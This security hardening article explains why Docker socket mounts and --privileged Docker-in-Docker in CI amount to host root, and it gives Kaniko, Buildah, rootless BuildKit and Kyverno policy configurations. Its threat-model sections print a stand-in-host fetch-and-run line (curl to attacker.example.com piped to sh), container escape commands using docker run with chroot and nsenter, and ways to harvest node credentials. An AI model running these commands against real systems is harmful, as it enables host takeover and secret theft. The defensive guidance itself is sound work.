Docker-in-Docker and the Shared Kernel Double Bind: Why --privileged in CI Is Host Root

The Problem

Building container images in CI requires a container build tool running inside the CI environment — which is itself, in almost every modern Kubernetes-based CI system, a container. This creates a structural problem: how does a process running inside a container build another container image? Three patterns emerged historically, and understanding why the first two remain widespread is important context for understanding why they persist despite being security disasters.

Pattern 1: Docker Socket Mount

The CI job container has /var/run/docker.sock mounted from the host. Any docker build, docker push, or docker run command inside the CI job connects directly to the host Docker daemon via the Unix domain socket. This is not Docker-in-Docker — there is no inner Docker daemon — but it is strictly worse from a security perspective because the docker CLI binary in the container is just a thin client: all operations execute in the context of the host daemon running as root.

What this concretely grants to the CI job:

Arbitrary privileged container creation on the host. docker run --privileged -v /:/host alpine chroot /host runs as root with full host filesystem access. One command, executed from inside the CI container, gives you a root shell on the Kubernetes node.
Full read access to all running containers’ environments. docker inspect against any container ID on the host returns the full environment variable set for that container, including secrets injected as environment variables by Kubernetes, CI orchestrators, or other build jobs.
Host credential access. The Docker daemon runs with the node’s Docker Hub, ECR, GCR, or other registry credentials cached in /root/.docker/config.json. A CI job with socket access can read those credentials directly or use them implicitly via docker pull.
Full Docker API access. Volumes, networks, secrets (Docker Swarm secrets), configs — everything the Docker daemon manages is accessible.

The RUN steps in a Dockerfile execute inside ephemeral containers created by the daemon. If a Dockerfile contains RUN curl https://attacker.example.com/payload.sh | sh, that command runs in a container managed by the host daemon. With socket mount, the attacker payload executes with the full capabilities of a container spawned by root — not inside a sandboxed nested container.

This pattern became popular because it is simple: mount the socket, use docker build as-is. CI systems like early Jenkins pipelines and Docker Compose-based CI environments standardised on it. GitLab’s documentation recommended it for years. It remains the default in many internal CI configurations because engineers set it up five years ago and it worked, and no one audited the security implications.

Pattern 2: Docker-in-Docker (–privileged)

A Docker daemon runs inside the CI container. To give this inner daemon the kernel capabilities it needs — mounting overlay filesystems, manipulating cgroup hierarchies, creating network namespaces — the outer container is started with --privileged.

--privileged does three distinct things, each of which individually destroys container isolation:

Grants all Linux capabilities. A non-privileged container has a restricted capability set. --privileged adds CAP_SYS_ADMIN, CAP_NET_ADMIN, CAP_SYS_PTRACE, CAP_SYS_MODULE, and all other capabilities in the full set. CAP_SYS_ADMIN alone is effectively root — it allows mounting arbitrary filesystems, manipulating namespaces, and loading kernel modules.
Disables seccomp filtering. The seccomp profile that restricts the system calls a container can invoke is removed entirely. Every system call in the kernel ABI is available to processes inside the container.
Disables AppArmor and SELinux MAC enforcement. The Mandatory Access Control profiles that constrain what files and devices a container can access are not applied.

The result is a container that shares the host kernel and has no meaningful restrictions beyond what the kernel itself imposes on a root process. A container with --privileged is not “root with elevated permissions” — it is root on the host, expressed through a user namespace that provides minimal additional protection.

The security distinction between --privileged DinD and the socket mount pattern is narrow in practice: the socket mount is a direct path to the host daemon; --privileged DinD provides a slightly indirect path via kernel CVE exploitation or the nsenter technique. With --privileged, nsenter --target 1 --mount --uts --ipc --net --pid -- bash joins the PID 1 (host init) namespace from inside the container. This is a documented, trivial escape requiring zero kernel vulnerabilities.

The DinD pattern was popularised by Jérôme Petazzoni’s 2013 blog post “Using Docker-in-Docker for your CI or testing environment” — the same author who later wrote a follow-up explicitly recommending against it for CI use. GitLab’s own documentation for their Docker executor still recommends privileged = true in the runner configuration as the supported approach for building Docker images. This is documented host compromise as an official configuration.

Pattern 3: The Correct Approach

Three production tools build OCI-compliant container images without requiring a Docker daemon, without --privileged, and without mounting the host socket. All three operate in userspace and use only unprivileged kernel facilities.

Kaniko (Google, 2018): Reads a Dockerfile and builds layers directly in userspace by unpacking base image layers to a directory, executing RUN commands with chroot into that directory, and snapshotting filesystem changes between steps using file modification timestamps and hash comparisons. The built image is pushed directly to a registry. Kaniko does not start a Docker daemon. The executor container does run as root inside the container (it needs to chroot and manipulate filesystem ownership), but it does not require --privileged and does not require kernel mount operations. The container can drop all Linux capabilities except those strictly needed for chroot operations.

Buildah (Red Hat, 2017): Builds OCI images without a daemon, supports rootless mode using kernel user namespace remapping (newuidmap/newgidmap). In rootless mode, the build process runs as a non-root user on the host and uses user namespace remapping to simulate root inside the build environment. Buildah supports a --isolation chroot mode that replaces kernel namespace creation with plain chroot, enabling builds in environments that do not permit user namespace creation. Buildah also supports OCI and Docker image formats, multiple transport protocols, and scripted builds via shell scripts rather than Dockerfiles.

BuildKit in rootless mode (Moby, docker/buildx): BuildKit is the build backend for docker buildx and can run as a standalone daemon (buildkitd) in rootless mode. Rootless BuildKit runs the build daemon as a non-root user using user namespaces, with no privileged operations required. The --oci-worker-no-process-sandbox flag trades kernel namespace sandboxing for a seccomp-only sandbox — lower isolation but broader compatibility across kernel configurations. GitHub-hosted Actions runners use BuildKit rootless mode automatically for the docker/build-push-action.

Threat Model

Docker socket mount — full host daemon access from any RUN step. The attack surface is every line of a Dockerfile, every build dependency pulled during the build, and every environment variable injected into the build environment. A poisoned base image (FROM malicious-base:latest) that has replaced a binary with a backdoored version will execute during the build with access to the host Docker socket. A compromised npm package pulled during RUN npm install executes its install scripts with socket access. A supply chain compromise upstream of the build — a poisoned layer in any transitive base image — executes with full host daemon access. The attacker does not need to compromise the CI infrastructure; they need to compromise one artifact in the build’s dependency graph.

--privileged DinD — kernel CVE exploitation reaches the Kubernetes node directly. CVE-2022-0847 (Dirty Pipe) demonstrated the class of vulnerability relevant here: a kernel vulnerability exploitable from inside a container that grants overwrite access to arbitrary read-only files, including the host’s /etc/passwd, /proc/sched_debug, and SUID binaries. Dirty Pipe was exploitable from inside --privileged containers — the container shares the kernel, so kernel vulnerabilities have the same exploitability profile as from the host. An attacker running arbitrary code inside the inner Docker environment (via a compromised build step) can exploit kernel vulnerabilities to reach the outer host without needing a container escape first, because --privileged has already removed the barriers.

The nsenter escape requires no kernel vulnerability. Any process inside a --privileged container can join the host’s PID namespace and execute commands with full host access in approximately two commands. This is not exploitation — it is intended kernel namespace functionality working correctly.

Node compromise in a shared build cluster — the blast radius is every secret on the node. In a Kubernetes cluster where multiple teams’ build jobs run on shared nodes, one compromised build job that achieves host access on its node can access:

All other pods’ environment variables. crictl inspect <pod-id> on the node returns environment variables for every running pod, including those in different namespaces. In a busy build cluster, this includes other teams’ GITHUB_TOKENs, AWS credentials, Docker Hub passwords, and deployment keys currently in use.
Kubelet credentials. The kubelet’s client certificate and key are stored on the node at /var/lib/kubelet/pki/. These credentials authenticate to the Kubernetes API server with the node’s identity. Depending on RBAC configuration, the node identity may permit reading secrets across namespaces.
Cloud IMDS credentials. Cloud providers’ Instance Metadata Service endpoints (169.254.169.254 for AWS, Azure; metadata.google.internal for GCP) are accessible from the node and return credentials scoped to the node’s IAM role. The node IAM role in many Kubernetes deployments has broad permissions to support node operations. In AWS, this typically includes ecr:GetAuthorizationToken and may include s3:*, secretsmanager:GetSecretValue, or broader IAM permissions depending on how the cluster was configured.
Registry credentials cached on the node. Docker and containerd cache registry authentication tokens. On a node that has pulled images from ECR, the cached token from /root/.docker/config.json or containerd’s credential cache grants docker pull access to every image in the account until the token expires.

GitLab CI Docker executor with privileged = true. GitLab’s official documentation for building Docker images in CI pipelines using the Docker executor reads: “Make the Docker executor privileged.” The config.toml snippet provided in the documentation contains privileged = true. This configuration applies to all jobs on that runner, not just image-building jobs. Any job that runs on a privileged runner — including jobs that do nothing more than run unit tests — runs in a --privileged container with full host access. GitLab groups can contain hundreds of repositories, and runners are frequently shared. A malicious actor who can push a branch to any repository in the group can trigger a CI job on the privileged runner, escape to the host, and access secrets from all other concurrent jobs.

Supply chain via poisoned base image with socket access. A build pipeline that uses FROM python:3.12-slim and mounts the Docker socket is trusting the security of the python image on Docker Hub, the security of Docker Hub’s image signing infrastructure, and the security of every layer in the image’s history. The python:3.12-slim image has hundreds of transitive dependencies. A compromise of any layer that executes code during the build (e.g., via a package manager in the base image that runs scripts) gives socket access. The Codecov breach (2021) demonstrated that even widely-trusted CI tooling with millions of installations can be compromised to exfiltrate credentials. A similarly-scoped compromise of a base image used in a socket-mounted build environment gives full host access rather than credential exfiltration.

Hardening Configuration

1. Kaniko in Kubernetes — No Privileged Required

Kaniko runs as a Kubernetes Pod with no special privileges. Registry credentials are passed via a Kubernetes Secret mounted as a volume.

apiVersion: v1
kind: Secret
metadata:
  name: registry-credentials
  namespace: ci-builds
type: kubernetes.io/dockerconfigjson
data:
  .dockerconfigjson: <base64-encoded-docker-config-json>
---
apiVersion: v1
kind: Pod
metadata:
  name: kaniko-build
  namespace: ci-builds
spec:
  initContainers:
  - name: git-clone
    image: alpine/git:latest
    command:
    - git
    - clone
    - https://github.com/myorg/myrepo
    - /workspace
    volumeMounts:
    - name: workspace
      mountPath: /workspace
    securityContext:
      runAsNonRoot: true
      runAsUser: 1000
      allowPrivilegeEscalation: false
      capabilities:
        drop: ["ALL"]
  containers:
  - name: kaniko
    image: gcr.io/kaniko-project/executor:v1.23.0
    args:
    - "--dockerfile=/workspace/Dockerfile"
    - "--context=dir:///workspace"
    - "--destination=myregistry.io/myimage:latest"
    - "--cache=true"
    - "--cache-repo=myregistry.io/myimage/cache"
    - "--cleanup"
    volumeMounts:
    - name: workspace
      mountPath: /workspace
    - name: registry-credentials
      mountPath: /kaniko/.docker
    securityContext:
      # Kaniko requires root inside the container for chroot operations,
      # but does NOT require --privileged or any elevated capabilities
      runAsNonRoot: false
      runAsUser: 0
      allowPrivilegeEscalation: false
      capabilities:
        drop: ["ALL"]
        # Kaniko needs CHOWN and FSETID to correctly set file ownership
        # in built image layers
        add: ["CHOWN", "FSETID", "DAC_OVERRIDE"]
      seccompProfile:
        type: RuntimeDefault
  volumes:
  - name: workspace
    emptyDir: {}
  - name: registry-credentials
    secret:
      secretName: registry-credentials
      items:
      - key: .dockerconfigjson
        path: config.json
  restartPolicy: Never
  serviceAccountName: kaniko-builder
  automountServiceAccountToken: false

Key points: allowPrivilegeEscalation: false prevents the executor from gaining additional privileges beyond what it starts with. seccompProfile: RuntimeDefault applies the container runtime’s default seccomp profile, restricting available system calls to a vetted list. No hostPath volumes. No socket mount. automountServiceAccountToken: false prevents the build pod from authenticating to the Kubernetes API — the build job does not need cluster access.

For temporary credentials (AWS ECR, GCR with Workload Identity), use a credential helper as an init container that writes a short-lived config.json to a shared emptyDir volume:

initContainers:
- name: ecr-credentials
  image: amazon/aws-cli:latest
  command:
  - sh
  - -c
  - |
    aws ecr get-login-password --region us-east-1 \
      | jq -Rn --arg token "$(cat)" \
        '{"auths":{"123456789.dkr.ecr.us-east-1.amazonaws.com":{"auth":($token|@base64)}}}' \
      > /kaniko/.docker/config.json
  volumeMounts:
  - name: docker-config
    mountPath: /kaniko/.docker
  securityContext:
    runAsNonRoot: true
    allowPrivilegeEscalation: false
    capabilities:
      drop: ["ALL"]

2. Buildah Rootless in GitLab CI

Buildah supports a chroot isolation mode that avoids kernel namespace creation entirely. Combined with the vfs storage driver, this produces builds that work inside standard unprivileged containers.

# .gitlab-ci.yml
build:
  image: quay.io/buildah/stable:v1.35.0
  variables:
    # chroot isolation: use chroot(2) instead of creating kernel namespaces.
    # Works in unprivileged containers. Slightly less isolation than
    # namespace-based isolation but requires no special kernel permissions.
    BUILDAH_ISOLATION: chroot
    # vfs storage driver: plain directory tree with full copies between layers.
    # No overlay mount operations, no kernel mount capabilities required.
    # Significantly slower than overlay but works without privileges.
    STORAGE_DRIVER: vfs
    # Disable overlay in storage config entirely
    BUILDAH_FORMAT: oci
  script:
  - buildah bud --isolation chroot --storage-driver vfs -t myimage:latest .
  - buildah push --creds "$REGISTRY_USER:$REGISTRY_PASSWORD" \
      myimage:latest \
      docker://myregistry.io/myimage:$CI_COMMIT_SHORT_SHA
  - buildah push --creds "$REGISTRY_USER:$REGISTRY_PASSWORD" \
      myimage:latest \
      docker://myregistry.io/myimage:latest

The BUILDAH_ISOLATION=chroot variable tells Buildah to use chroot(2) for build step isolation rather than creating new user, mount, and network namespaces. This is less isolation than full namespace separation — processes inside RUN steps can see the host’s PID namespace and network interfaces — but it is functionally equivalent to the isolation provided by Docker’s default (non-privileged) container builds, and it requires no elevated kernel permissions.

STORAGE_DRIVER=vfs tells Buildah to use plain directory copies between layers rather than overlay filesystem mounts. This means each layer is a full copy of the previous layer’s directory tree rather than a copy-on-write overlay. For large images (e.g., images with a 1 GB base layer), this increases build time and disk usage substantially. For small images, the difference is acceptable.

For environments where user namespaces are available (kernels with CONFIG_USER_NS=y and kernel.unprivileged_userns_clone=1), Buildah rootless with overlay provides better performance and the stronger isolation of namespace separation:

# /etc/containers/storage.conf inside the Buildah container image
# (configure via a custom image or mounted configmap)
[storage]
driver = "overlay"
[storage.options.overlay]
mount_program = "/usr/bin/fuse-overlayfs"

fuse-overlayfs implements overlay filesystem semantics in userspace via FUSE, avoiding the kernel-level mount(2) operations that require privileges.

3. BuildKit Rootless in GitHub Actions and Self-Hosted Runners

GitHub-hosted ubuntu-* runners run BuildKit in rootless mode automatically when using docker/build-push-action. The action creates a BuildKit builder container using docker buildx create, which manages the buildkitd daemon in rootless mode.

# .github/workflows/build.yml
name: Build and Push Image

on:
  push:
    branches: [main]

permissions:
  contents: read
  id-token: write  # Required for OIDC registry authentication

jobs:
  build:
    runs-on: ubuntu-24.04
    steps:
    - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683
      # actions/checkout v4.2.2 pinned by SHA

    - name: Configure AWS credentials via OIDC
      uses: aws-actions/configure-aws-credentials@e3dd6a429d7300a6a4c196c26e071d42e0343502
      with:
        role-to-assume: arn:aws:iam::123456789:role/ci-image-push
        aws-region: us-east-1

    - name: Login to Amazon ECR
      id: ecr-login
      uses: aws-actions/amazon-ecr-login@062b18b96a7aff071d4dc91bc00c4c1a7945b076

    - name: Set up Docker Buildx
      uses: docker/setup-buildx-action@b5ca514318bd6ebac0fb2aedd5d36ec1b5c232a2
      with:
        # Explicitly use rootless mode. The default on GitHub-hosted runners
        # already uses rootless, but this makes it explicit and auditable.
        driver: docker-container
        driver-opts: |
          image=moby/buildkit:v0.18.2
          network=host

    - name: Build and push
      uses: docker/build-push-action@14487ce63c7a62a4a324b0bfb37086795e31c6c1
      with:
        context: .
        push: true
        tags: |
          ${{ steps.ecr-login.outputs.registry }}/myimage:${{ github.sha }}
          ${{ steps.ecr-login.outputs.registry }}/myimage:latest
        cache-from: type=registry,ref=${{ steps.ecr-login.outputs.registry }}/myimage:buildcache
        cache-to: type=registry,ref=${{ steps.ecr-login.outputs.registry }}/myimage:buildcache,mode=max
        provenance: true
        sbom: true

For self-hosted runners where rootless mode needs explicit configuration, create a rootless BuildKit builder manually:

# On the self-hosted runner host, as a non-root user
docker buildx create \
  --name rootless-builder \
  --driver docker-container \
  --driver-opt image=moby/buildkit:v0.18.2,network=host \
  --use

# Verify the builder runs without --privileged
docker inspect buildx_buildkit_rootless-builder0 \
  --format '{{ .HostConfig.Privileged }}'
# Expected output: false

# Verify no capability additions
docker inspect buildx_buildkit_rootless-builder0 \
  --format '{{ .HostConfig.CapAdd }}'
# Expected output: []

For environments where user namespaces are not available (some hardened Kubernetes configurations disable kernel.unprivileged_userns_clone), the --oci-worker-no-process-sandbox flag runs BuildKit build steps with seccomp-only sandboxing instead of full namespace isolation:

docker buildx create \
  --name compatible-builder \
  --driver docker-container \
  --driver-opt image=moby/buildkit:v0.18.2 \
  --driver-opt "env.BUILDKITD_FLAGS=--oci-worker-no-process-sandbox" \
  --use

This reduces isolation: build steps share the PID and network namespaces of the BuildKit daemon rather than running in isolated namespaces. It is still substantially more secure than --privileged DinD because the daemon itself runs without elevated host privileges.

4. OPA/Kyverno Policy: Block Docker Socket Mounts and --privileged at Admission

Admission control prevents the configuration from ever reaching production. Deploy as a Kyverno ClusterPolicy in Enforce mode so that pods violating the policy are rejected at the API server rather than audited after the fact.

apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
  name: block-privileged-builds
  annotations:
    policies.kyverno.io/title: Block Privileged Containers and Docker Socket Mounts
    policies.kyverno.io/description: >
      Privileged containers and Docker socket mounts grant full host access.
      Image builds must use Kaniko, Buildah, or rootless BuildKit.
spec:
  validationFailureAction: Enforce
  background: true
  rules:
  - name: block-privileged
    match:
      any:
      - resources:
          kinds: [Pod]
    validate:
      message: >
        Privileged containers are not permitted. Use Kaniko, Buildah with
        BUILDAH_ISOLATION=chroot, or rootless BuildKit for image builds.
        See https://systemshardening.com/articles/cicd/docker-in-docker-shared-kernel-risk/
      pattern:
        spec:
          =(initContainers):
          - =(securityContext):
              =(privileged): "false"
          containers:
          - =(securityContext):
              =(privileged): "false"
          =(ephemeralContainers):
          - =(securityContext):
              =(privileged): "false"

  - name: block-docker-socket-hostpath
    match:
      any:
      - resources:
          kinds: [Pod]
    validate:
      message: >
        Mounting /var/run/docker.sock grants full host Docker daemon access.
        Remove the hostPath volume mount and use Kaniko or Buildah for image builds.
      deny:
        conditions:
          any:
          - key: "/var/run/docker.sock"
            operator: AnyIn
            value: "{{ request.object.spec.volumes[].hostPath.path | [?@ != null] }}"
          - key: "/run/docker.sock"
            operator: AnyIn
            value: "{{ request.object.spec.volumes[].hostPath.path | [?@ != null] }}"

  - name: block-containerd-socket-hostpath
    match:
      any:
      - resources:
          kinds: [Pod]
    validate:
      message: >
        Mounting the container runtime socket (/run/containerd/containerd.sock)
        grants host container runtime access equivalent to Docker socket access.
      deny:
        conditions:
          any:
          - key: "/run/containerd/containerd.sock"
            operator: AnyIn
            value: "{{ request.object.spec.volumes[].hostPath.path | [?@ != null] }}"

  - name: require-drop-all-capabilities
    match:
      any:
      - resources:
          kinds: [Pod]
          namespaces: [ci-builds]
    validate:
      message: >
        All containers in the ci-builds namespace must drop ALL capabilities.
        If a specific capability is required, add it explicitly with justification.
      pattern:
        spec:
          containers:
          - securityContext:
              capabilities:
                drop: ["ALL"]

The policy also blocks /run/containerd/containerd.sock mounts. Mounting the containerd socket is equivalent to mounting the Docker socket — it provides direct access to the container runtime’s gRPC API, which can be used to create privileged containers, read container filesystem contents, and inject processes into running containers.

Apply the policy and immediately test it:

# Apply the policy
kubectl apply -f block-privileged-builds.yaml

# Test: attempt to create a privileged pod — should be rejected
kubectl run test-privileged \
  --image=alpine \
  --overrides='{"spec":{"containers":[{"name":"test","image":"alpine","securityContext":{"privileged":true}}]}}' \
  --namespace=ci-builds

# Expected output:
# Error from server: admission webhook "validate.kyverno.svc-fail" denied the request:
# resource Pod/ci-builds/test-privileged was blocked due to the following policies
# block-privileged-builds/block-privileged:
#   Privileged containers are not permitted. Use Kaniko, Buildah with
#   BUILDAH_ISOLATION=chroot, or rootless BuildKit for image builds.

5. Dedicated Build Namespace with Network Policy for Legacy Migrations

When a migration from --privileged builds cannot be completed immediately, contain the blast radius. Isolate build workloads on dedicated nodes with taints and apply network egress restrictions that prevent the build node from reaching internal services.

# Taint dedicated build nodes so only build pods schedule there
kubectl taint nodes build-node-1 build-node-2 \
  role=privileged-builds:NoSchedule

# Label the nodes
kubectl label nodes build-node-1 build-node-2 \
  node-role=privileged-builds

# Toleration required on build pods to schedule on tainted nodes
spec:
  tolerations:
  - key: "role"
    operator: "Equal"
    value: "privileged-builds"
    effect: "NoSchedule"
  nodeSelector:
    node-role: privileged-builds
---
# NetworkPolicy: deny egress from ci-builds-legacy namespace to internal services
# Builds should only need to reach: git hosts, package registries, container registries
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: build-egress-restrictions
  namespace: ci-builds-legacy
spec:
  podSelector: {}
  policyTypes: [Egress]
  egress:
  # Allow DNS
  - ports:
    - port: 53
      protocol: UDP
    - port: 53
      protocol: TCP
  # Allow HTTPS to external hosts (package registries, git hosts, container registries)
  - ports:
    - port: 443
      protocol: TCP
  # Block access to cloud IMDS (169.254.169.254)
  # Note: this is a NetworkPolicy allowlist — the IMDS IP is not listed,
  # so connections to it are denied
  # Block access to internal Kubernetes API server explicitly
  # by NOT including the cluster CIDR in allowed destinations

The IMDS block is important. If a --privileged build escapes to the node, the first thing an attacker’s tooling will do is query http://169.254.169.254/latest/meta-data/iam/security-credentials/ to obtain temporary cloud credentials. While a NetworkPolicy does not constrain root processes that have escaped the container namespace, it does constrain network traffic from build pods that have not yet escaped — preventing a less sophisticated attack from reaching the IMDS without full container escape.

For the kubelet credential threat, there is no NetworkPolicy mitigation once a container has --privileged and has escaped to the node. The only mitigations are: use node-level RBAC to minimise what the kubelet identity can access, enable Kubernetes audit logging to detect anomalous API calls from node identities, and migrate off --privileged as a priority.

Expected Behaviour

Kaniko Build — No Privileged Capabilities

After creating the Kaniko build pod, inspect the container’s capability set:

# From inside the Kaniko container, before the build starts
kubectl exec -it kaniko-build -n ci-builds -- \
  cat /proc/self/status | grep Cap

# Expected output (capabilities dropped to minimum):
# CapInh: 0000000000000000
# CapPrm: 00000000000000d4  # CAP_DAC_OVERRIDE, CAP_FSETID, CAP_CHOWN
# CapEff: 00000000000000d4
# CapBnd: 00000000000000d4
# CapAmb: 0000000000000000

Decode the hex value to confirm which capabilities are present:

capsh --decode=00000000000000d4
# Output: 0x00000000000000d4=cap_chown,cap_dac_override,cap_fsetid

Compare with a --privileged container:

# Inside a --privileged container
cat /proc/self/status | grep Cap

# CapPrm: 000001ffffffffff  # All capabilities
# CapEff: 000001ffffffffff

The full capability set (0x1ffffffffff) includes CAP_SYS_ADMIN, CAP_SYS_PTRACE, CAP_NET_ADMIN, CAP_SYS_MODULE, and all others. The Kaniko container has only three, all scoped to filesystem ownership operations needed for correct layer construction.

Kyverno Policy Denial

When a CI job attempts to create a --privileged pod in the ci-builds namespace, the API server returns:

Error from server: admission webhook "validate.kyverno.svc-fail" denied the request:
resource Pod/ci-builds/my-dind-build was blocked due to the following policies

block-privileged-builds/block-privileged:
  Privileged containers are not permitted. Use Kaniko, Buildah with
  BUILDAH_ISOLATION=chroot, or rootless BuildKit for image builds.
  See https://systemshardening.com/articles/cicd/docker-in-docker-shared-kernel-risk/

This message should appear in the CI job log and be immediately actionable: the job fails with a policy violation, not a vague permission error.

Verifying No Docker Socket Presence

In a correctly-configured Kaniko or Buildah pod, the Docker socket should not be present:

kubectl exec -it kaniko-build -n ci-builds -- ls -la /var/run/docker.sock
# ls: /var/run/docker.sock: No such file or directory

kubectl exec -it kaniko-build -n ci-builds -- ls -la /run/docker.sock
# ls: /run/docker.sock: No such file or directory

If either path exists, a Docker socket mount is present and the configuration is incorrect.

Trade-offs

Kaniko works for the majority of Dockerfiles but has documented feature gaps relative to the Docker daemon build engine. The --mount=type=cache Dockerfile instruction for build caches was not supported until relatively recent versions; --mount=type=tmpfs and --mount=type=bind have had varying support across releases. Kaniko’s snapshot mechanism (comparing file modification timestamps and hashes between layers) can produce incorrect results for builds that modify files without changing their timestamps — a rare but documented issue. Kaniko’s layer cache is stored in a registry rather than on the build node, which means cache hits require a registry round-trip; cold starts are slower than Docker’s local layer cache. Verify Dockerfile compatibility with Kaniko’s documented unsupported features list before migrating production builds.

Buildah with STORAGE_DRIVER=vfs is significantly slower than overlay-based builds because every layer transition requires a full directory copy rather than a copy-on-write operation. For a build with a 500 MB base image and five RUN layers, vfs storage may require 2-3 GB of disk I/O per build where overlay would require a fraction of that. This is acceptable for small images and low-concurrency builds but can cause disk pressure in high-throughput build clusters. If the runner environment supports fuse-overlayfs, use it. If not, monitor disk usage and build duration carefully.

Rootless BuildKit requires CONFIG_USER_NS=y in the kernel and kernel.unprivileged_userns_clone=1 if the distribution kernel disables it by default. Debian and Ubuntu kernels enable this by default; some hardened distributions (RHEL/CentOS with certain security profiles, hardened Debian) disable it. Check before relying on rootless mode in self-hosted environments:

cat /proc/sys/kernel/unprivileged_userns_clone
# 1 = user namespaces available to unprivileged users
# 0 = user namespaces restricted — rootless BuildKit will not function

The --oci-worker-no-process-sandbox workaround allows BuildKit to run without user namespaces, but at reduced isolation. This is a deployment-time decision, not a build-time one — the security properties of the build environment change based on whether the flag is set.

All three tools add operational complexity compared to docker build. Build time differences are real. Cache behaviour differs from Docker’s local layer cache. Dockerfile compatibility requires testing. These are accepted costs for eliminating host root access from build infrastructure. The alternative cost — a single compromised build dependency reaching all secrets in your CI cluster — is not bounded.

Failure Modes

Using docker:dind without reading what it requires. The official docker:dind image is designed for running a Docker daemon inside a container. It works correctly only with --privileged. The image’s documentation and Docker Hub page state this. CI configurations that add this image without understanding its requirements end up with --privileged pods, sometimes in namespaces that were not intended to allow it. The failure mode is silent: the build works correctly, --privileged is present, and the security team discovers this six months later during an audit.

Assuming Kaniko is a drop-in Dockerfile replacement without testing. Kaniko implements a large subset of Dockerfile syntax but not all of it. Builds that use RUN --mount=type=cache for Go module or npm package caching, builds that use complex COPY --chmod flags, or builds that rely on specific Docker daemon behaviour for multi-stage builds may fail or produce incorrect results. Always run Kaniko against your actual Dockerfiles in a staging environment before removing --privileged from production build pipelines. Track Kaniko’s open issues — some Docker features are open enhancement requests, not temporary gaps.

Mounting the Docker socket “just for CI” without reviewing all build steps. The phrase “just for CI” implies reduced security impact. The opposite is true: CI pipelines pull dependencies, execute third-party code, and build from external base images. The attack surface is larger than production, not smaller. A team that mounts the Docker socket to allow docker build inside their CI containers has granted every RUN step in every Dockerfile, every npm install script, and every build-time tool with shell access the ability to create privileged containers on the Kubernetes node. The socket mount is not scoped to image building operations — it is a credential to the host daemon, usable for any Docker operation.

Treating the build namespace as a less critical namespace and skipping admission control. Kubernetes namespaces provide no security boundary between pods in different namespaces on the same node. A privileged pod in ci-builds can access resources in production if they share a node. The ci-builds namespace is often treated as infrastructure rather than security domain, and admission controllers are deployed in enforcement mode for production and staging while ci-builds remains in audit mode or has exceptions. The correct configuration is enforcement mode in every namespace, including build namespaces — the blast radius of a build compromise is at minimum all other jobs on the same node, and with node-level access, extends to cluster-wide IAM credentials.

Conflating “rootless container” with “safe for CI builds.” Running the CI job container itself as a non-root user does not prevent --privileged from being dangerous. A container running as UID 1000 with --privileged still has all capabilities and all system calls available. --privileged overrides user namespace restrictions. The security properties that matter are the presence or absence of --privileged and the presence or absence of the Docker socket mount — not the UID the container’s entry process runs as.